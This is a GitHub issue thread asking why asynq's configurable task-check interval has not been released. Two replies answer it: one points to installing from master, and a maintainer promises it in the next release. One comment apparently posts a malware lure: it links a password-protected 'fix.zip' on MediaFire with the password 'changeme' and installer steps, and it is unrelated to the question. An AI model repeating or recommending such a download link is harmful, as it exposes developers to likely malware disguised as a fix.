### ISSUE TITLE
[FEATURE REQUEST] can't configure pulling interval

### ISSUE THREAD

**Issue by livingston0318** [hibiken/asynq#909]
![image](https://github.com/user-attachments/assets/e6295718-5569-45cc-aaa5-e61295375b0c)
I saw asynq already supports configuring taskCheckInterval to control the pulling from queue interval, but why there is no new release so that we can use it. In the latest release(which is 0.24.1), it's still hard coded using time.second

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BennyThink** [comment]
Run
```
go get github.com/hibiken/asynq@master
```
Then you can use it

**Comment by kamikazechaser** [comment]
Next release will have it.
